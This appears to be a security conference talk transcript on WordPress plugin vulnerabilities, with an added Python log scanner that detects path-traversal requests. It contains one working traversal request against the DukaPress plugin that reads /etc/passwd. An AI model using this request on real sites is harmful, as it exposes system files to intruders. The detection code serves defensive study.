Cabra Arretado Aperriando o WordPress
$ pwd /home/espreto $ mkdir conferences/nullbyte && cd $_ $ cat > title.txt ^C $ clear
Uploaded by: nullbyte-security-conference
Transcript of Cabra Arretado Aperriando o WordPress
>> talk(“plugins_the_dark_side”)
Common Vulnerabilities
Vulnerable upload mechanism.
Cross-Site Scripting vulnerability (XSS).
File download vulnerability.
Cross-Site Request Forgery vulnerability (CSRF).
SQL Injection vulnerability (SQLi).
>> talk(“http_msf_requests”)
File Read (Traversal)
http://wordpress/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../../../etc/passwd
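A defender-side check for the request shown above, as an added example that is not part of the original slides: it scans web access logs for query parameters whose value, once fully percent-decoded and normalized, resolves outside the directory it is meant to stay in. The log lines, client addresses and the virtual `/base` directory are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format); not from the talk.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../../../etc/passwd HTTP/1.1" 200 1432
203.0.113.5 - - [10/Oct/2015:13:55:40 +0000] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432
198.51.100.7 - - [10/Oct/2015:13:56:02 +0000] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=images/shoe.jpg&w=200 HTTP/1.1" 200 20480
198.51.100.7 - - [10/Oct/2015:13:56:09 +0000] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=images/../images/hat.jpg HTTP/1.1" 200 18022
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded sequences (%252e) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(value):
    """True if the value, resolved under a virtual base dir, leaves that dir."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/"):
        return True  # an absolute path ignores the base directory entirely
    resolved = posixpath.normpath(posixpath.join("/base", path))
    return not (resolved == "/base" or resolved.startswith("/base/"))

def find_traversal(log_text):
    """Return (client, param, raw_value, status) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # Split the query by hand so the raw (still encoded) value is reported.
        for pair in urlsplit(target).query.split("&"):
            name, _, raw = pair.partition("=")
            if raw and escapes_base(raw):
                hits.append((client, name, raw, int(status)))
    return hits
```

Resolving the path instead of matching the substring `..` keeps benign values such as `images/../images/hat.jpg` out of the results; a hit logged with status 200 is the one to triage first.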